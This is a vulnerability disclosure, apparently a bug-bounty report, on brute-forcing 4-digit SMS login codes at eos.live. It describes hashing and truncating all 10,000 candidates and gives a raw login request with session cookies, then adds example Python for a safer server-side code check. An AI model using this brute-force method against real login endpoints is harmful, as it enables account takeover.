Vulnerability URL: https://eos.live/
Brief description: The SMS verification code is 4 digits with no time limit; the client submits 4 characters cut from its SHA-256 hash, so a script that hashes and cuts each candidate is all that is needed.
Proof of vulnerability:
https://eos.live/
Mobile-number verification code login, 4-digit code
The code is hashed here: 0000 becomes b336
Looking at the JS, it is SHA-256 hashed and 4 characters are taken starting from the fifth character of the hex string
Hashing 0000 this way gives exactly b336
Write a script that loops over 0000-9999, SHA-256 hashes each value, then takes 4 characters starting from the fifth
PHP script
Import the 4-character hashed and truncated values into a text file for brute forcing; login succeeds
Exploit code:
POST /v1/user/login HTTP/1.1
Host: eos.live
Connection: close
Content-Length: 114
Accept: application/json, text/plain, */*
Origin: https://eos.live
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36
Content-Type: application/json;charset=UTF-8
Referer: https://eos.live/user/saozhu
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.2.1334098644.1535605506; _gid=GA1.2.1939758515.1535605506; connect.sid=s%3A2UBa2wYv9kPj9axP584NX4NCx1rT9Ha3.VD0FMlk85%2BkFrGxQBn9S5Miu55ogO86sabYBpmYYJZM
{"username":"","mobile":"+86130xxxxxxxx","smscode":"3543","ucode":"3582201127","captchatext":"f397","password":""}
Fix recommendation:
Use a 6-digit code with a time limit
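As an added illustration of the recommended fix (this is my own example code, not code from the report or from eos.live), the following Python sketch shows what the server side of SMS-code login needs so that the weakness above cannot recur: a 6-digit code drawn from a cryptographic RNG, a fixed validity window, a per-number attempt counter that invalidates the code after a few wrong guesses, single use, and a constant-time comparison. Class and function names, the in-memory dictionary standing in for a real store, and the constants (5-minute TTL, 5 attempts) are my assumptions. Note that hashing the code in the browser, as the site did, adds nothing: the candidate set is still the 10,000 possible 4-digit codes, so the server-side limits are what actually matter.

```python
import hmac
import secrets
import time
from dataclasses import dataclass

# Assumed policy values for this example
CODE_DIGITS = 6        # 10**6 candidates instead of 10**4
TTL_SECONDS = 300      # code is only valid for 5 minutes
MAX_ATTEMPTS = 5       # wrong guesses allowed before the code is discarded


@dataclass
class PendingCode:
    code: str
    expires_at: float
    attempts: int = 0


class SmsOtpService:
    """Server-side issue/verify logic for SMS login codes (example, not the site's code)."""

    def __init__(self, now=time.time):
        self._now = now          # injectable clock so expiry can be tested
        self._pending = {}       # mobile -> PendingCode; stand-in for Redis/DB

    def issue(self, mobile):
        # secrets (not random) so codes are unpredictable; zero-padded to fixed width
        code = f"{secrets.randbelow(10 ** CODE_DIGITS):0{CODE_DIGITS}d}"
        self._pending[mobile] = PendingCode(code=code, expires_at=self._now() + TTL_SECONDS)
        # The plain code goes only to the SMS gateway; nothing derived from it
        # (hash, truncation, etc.) is ever returned to the browser.
        return code

    def verify(self, mobile, submitted):
        entry = self._pending.get(mobile)
        if entry is None:
            return False, "no_pending_code"
        if self._now() > entry.expires_at:
            del self._pending[mobile]
            return False, "expired"
        entry.attempts += 1
        # Constant-time compare so response timing leaks nothing about the code
        if hmac.compare_digest(entry.code.encode(), str(submitted).encode()):
            del self._pending[mobile]           # single use: a code never verifies twice
            return True, "ok"
        if entry.attempts >= MAX_ATTEMPTS:
            del self._pending[mobile]           # too many guesses: force a fresh code
            return False, "locked"
        return False, "mismatch"


if __name__ == "__main__":
    svc = SmsOtpService()
    mobile = "+8613000000000"                  # constructed sample number
    code = svc.issue(mobile)
    print("issued (would be sent by SMS):", code)
    print(svc.verify(mobile, "000000"))        # (False, "mismatch") unless very lucky
    print(svc.verify(mobile, code))            # (True, "ok")
    print(svc.verify(mobile, code))            # (False, "no_pending_code") - already used
```

With these limits in place an attacker gets at most MAX_ATTEMPTS guesses per issued code within TTL_SECONDS, so the 10**6 keyspace cannot be enumerated the way the 10**4 one was; in production the counter and pending codes should live in a shared store, and code issuance itself should be rate limited per number and per client.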